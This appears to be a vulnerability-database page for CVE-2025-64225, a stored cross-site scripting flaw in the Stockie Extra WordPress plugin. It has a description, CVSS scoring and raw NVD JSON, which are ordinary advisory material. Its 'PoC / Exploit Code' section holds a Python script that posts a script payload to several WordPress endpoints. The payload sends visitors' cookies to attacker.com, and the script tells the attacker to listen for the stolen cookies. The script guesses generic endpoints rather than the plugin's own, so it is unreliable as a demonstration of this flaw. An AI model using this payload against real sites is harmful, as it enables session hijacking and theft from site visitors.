Security Vulnerability Report
中文
CVE-2025-64225 CVSS 6.5 MEDIUM

CVE-2025-64225

Published: 2025-12-18 08:16:12
Last Modified: 2026-04-27 16:16:36

Description

Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in colabrio Stockie Extra stockie-extra allows Code Injection.This issue affects Stockie Extra: from n/a through <= 1.2.11.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Stockie Extra <= 1.2.11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-64225 Stockie Extra Stored XSS PoC # Affected: Stockie Extra <= 1.2.11 import requests import json target_url = "http://target-wordpress-site.com" # Payload: Stored XSS via script tag injection xss_payload = '<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>' # Find the vulnerable endpoint (typically in plugin's AJAX handler or form submission) endpoints = [ "/wp-admin/admin-ajax.php", "/wp-json/wp/v2/comments", "/?rest_route=/wp/v2/comments" ] headers = { "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36" } # Payload injection via comment or content submission data = { "comment": xss_payload, "submit": "Submit" } print(f"[*] Testing CVE-2025-64225 on {target_url}") print(f"[*] Payload: {xss_payload}") for endpoint in endpoints: url = target_url + endpoint try: response = requests.post(url, data=data, headers=headers, timeout=10) if response.status_code in [200, 201]: print(f"[+] Payload submitted to {url}") print(f"[+] Response: {response.text[:200]}") except requests.RequestException as e: print(f"[-] Error targeting {url}: {e}") print("\n[*] If successful, the XSS will be stored and executed when pages are viewed.") print("[*] Attacker's server should be listening to capture stolen cookies.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64225", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:16:12.287", "lastModified": "2026-04-27T16:16:35.527", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in colabrio Stockie Extra stockie-extra allows Code Injection.This issue affects Stockie Extra: from n/a through <= 1.2.11."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-80"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/stockie-extra/vulnerability/wordpress-stockie-extra-plugin-1-2-11-content-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}